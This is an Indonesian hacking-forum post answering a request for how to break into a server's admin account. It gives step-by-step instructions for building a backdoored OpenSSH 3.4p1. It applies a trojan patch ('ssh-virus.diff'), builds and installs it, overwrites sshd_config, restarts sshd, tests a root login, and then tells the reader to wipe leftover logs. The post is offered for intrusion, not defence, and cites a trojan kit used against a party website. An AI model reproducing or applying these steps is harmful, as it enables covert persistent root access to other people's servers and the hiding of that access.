- skandal_oeban wrote:
- da uang tau gak cara kita masuk ke admid server gunkan linux katanya bisa gt, kasih tau donk!!!
Gak harus pake linux deh klO mo jebolin server... Baca nih Backdoor Open SSH -3.41p1Dalam sebuah kasus, ketika dilakukan percobaan menginfeksi SSH, ada beberapa trojankit untuk itu, anggap saja kalian pernah memakai backdoor yang disebut dengan nama shv4.tar.gz (release oleh penturichi pada tahun 2002). Tool itu umum dan mungkin sangatlah mudah digunakan oleh para intruder (contoh: kasus Website GOLKAR ) untuk memudahkan mereka keluar masuk server (tentunya dengan fake login). Namun yang menjadi masalah disini adalah efek selanjutnya dari server itu sendiri, kadang yang terjadi adalah rusaknya library dan tidak berjalannya command command yang ada di /bin.
Apakah ada jalan lain? (yang aman tanpa membuka port seperti backdoor yang umum digunakan). Jawabnya ada, dan mari kita mencoba membahas sedikit walaupun gw disini kurang pandai menjelaskan secara detail dan fokus.
Mencoba menginfeksi openSSH untuk dijadikan backdoor (private) tidak sesulit yang dibayangkan oleh berbagai khalayak/kelompok hacker di Indonesia (walaupun selama ini belum pernah gw temui the real hacker di Indonesia ini).
Beberapa tool yang dibutuhkan adalah:
1. file openSSH-3.4p1 (http://www.openssh.com)
2. patch infeksi openSSH
Cara mengolahnya adalah:
Pertama yang dilakukan adalah extract file openSSH yang sudah terdownload, kemudian anda patch file injeksi kedalam direktori openSSH anda.
1. # cp ssh-virus.diff openssh-3.4p1/
2. # cd openssh-3.4p1/
3. # patch < ssh-virus.diff
Selanjutnya kita coba tools yang baru saja kita patch kedalam server sendiri dirumah anda. (klO anda punya) bagaimana caranya?
Pertama adalah melakukan proses konfigurasi dengan cara
# ./configure atau dengan option yang lebih spesifik
# ./configure --prefix=/usr --sysconfdir=/etc/ssh
Kemudian melakukan make dan make install dengan cara
make ; make install
Setelah semua selesai dilakukan yang terakhir adalah menimpa file sshd_config dengan cara:
# mv -f sshd_config /etc/ssh/sshd_config
Selesai menimpa file sshd_config, dan ini adalah sebagai langkah final adalah restart SSH dengan cara
# ps -x | grep sshd
# kill -HUP (sshd pid)
/usr/sbin/sshd yang kita kill disini adalah sshd yang terbaru biasanya terletak pada baris paling atas. Sesudah kita lakukan kita cek apakah pintu masuk kita yang baru sudah berjalan dengan sukses apa tidak?
# telnet localhost 22
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.4p1
Nah setelah selesai, kita mencoba login kedalam server percobaan:
# ssh -l root localhost
root@localhost's password:
Last login: Mon Jul 28 14:12:22 2003 from bsd0.camne.net
OpenBSD 3.3 (GENERIC) #44: Sat Mar 29 13:22:05 MST 2003
Welcome to OpenBSD: The proactively secure Unix-like operating system.
Wow.. pintu masuk kita yang baru berhasil kita jalankan.. Selanjutnya silahkan membersihkan beberapa log yang tertinggal dengan cara manual atau dengan memakai utilitas yang tersedia.
Sekian dulu yah....
Capek neh....
Catatan : Berhasil dicoba dengan menggunakan Platform Linux RedHat 7.21 & Windows XP Pack2 Black EditionView My Link's#UbanForum#IndoForum#BatamHackerCommunity